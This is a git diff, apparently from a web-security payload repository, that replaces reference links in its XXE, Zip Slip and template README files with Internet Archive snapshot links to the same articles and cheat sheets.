+- [Pentest XXE - @phonexicum - March 9, 2020](https://web.archive.org/web/20260306152955/https://phonexicum.github.io/infosec/xxe.html)
+- [Playing with Content-Type – XXE on JSON Endpoints - Antti Rantasaari - April 20, 2015](https://web.archive.org/web/20240615071332/https://www.netspi.com/blog/technical-blog/web-application-pentesting/playing-content-type-xxe-json-endpoints/)
+- [REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS - Optistream - May 27, 2024](https://web.archive.org/web/20240527202144/https://www.optistream.io/blogs/tech/redteam-stories-1-soapy-xxe)
 - [XML attacks - Mariusz Banach (@mgeeky) - December 21, 2017](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
-- [XML external entity (XXE) injection - PortSwigger - May 29, 2019](https://portswigger.net/web-security/xxe)
-- [XML External Entity (XXE) Processing - OWASP - December 4, 2019](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
-- [XML External Entity Prevention Cheat Sheet - OWASP - February 16, 2019](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
-- [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer) - Bruno Morisson - August 14, 2015](https://labs.integrity.pt/articles/xxe-all-the-things-including-apple-ioss-office-viewer/)
-- [XXE in Uber to read local files - httpsonly - January 24, 2017](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html)
-- [XXE inside SVG - YEO QUAN YANG - June 22, 2016](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
+- [XML external entity (XXE) injection - PortSwigger - May 29, 2019](https://web.archive.org/web/20190529163105/https://portswigger.net/web-security/xxe)
+- [XML External Entity (XXE) Processing - OWASP - December 4, 2019](https://web.archive.org/web/20160309065737/https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
+- [XML External Entity Prevention Cheat Sheet - OWASP - February 16, 2019](https://web.archive.org/web/20260306061747/https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
+- [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer) - Bruno Morisson - August 14, 2015](https://web.archive.org/web/20161111162257/https://labs.integrity.pt/articles/xxe-all-the-things-including-apple-ioss-office-viewer/)
+- [XXE in Uber to read local files - httpsonly - January 24, 2017](https://web.archive.org/web/20180701015455/https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html)
+- [XXE inside SVG - YEO QUAN YANG - June 22, 2016](https://web.archive.org/web/20211016174500/https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
 - [XXE payloads - Etienne Stalmans (@staaldraad) - July 7, 2016](https://gist.github.com/staaldraad/01415b990939494879b4)
-- [XXE: How to become a Jedi - Yaroslav Babin - November 6, 2018](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf)
+- [XXE: How to become a Jedi - Yaroslav Babin - November 6, 2018](https://web.archive.org/web/20260306152956/https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf)
diff --git a/Zip Slip/README.md b/Zip Slip/README.md
index 4dd56c3..b3d61ce 100644
--- a/Zip Slip/README.md	
+++ b/Zip Slip/README.md	
@@ -45,4 +45,4 @@ For a list of affected libraries and projects, visit [snyk/zip-slip-vulnerabilit
 ## References
 
 * [Zip Slip - Snyk - June 5, 2018](https://github.com/snyk/zip-slip-vulnerability)
-* [Zip Slip Vulnerability - Snyk - April 15, 2018](https://snyk.io/research/zip-slip-vulnerability)
+* [Zip Slip Vulnerability - Snyk - April 15, 2018](https://web.archive.org/web/20180605125813/https://snyk.io/research/zip-slip-vulnerability)
diff --git a/_template_vuln/README.md b/_template_vuln/README.md
index a7a2b83..e4b4524 100644
--- a/_template_vuln/README.md
+++ b/_template_vuln/README.md
@@ -36,4 +36,4 @@ Exploit
 
 ## References
 
-* [Blog title - Author (@handle) - Month XX, 202X](https://example.com)
+* [Blog title - Author (@handle) - Month XX, 202X](https://web.archive.org/web/20020120142510/http://example.com:80/)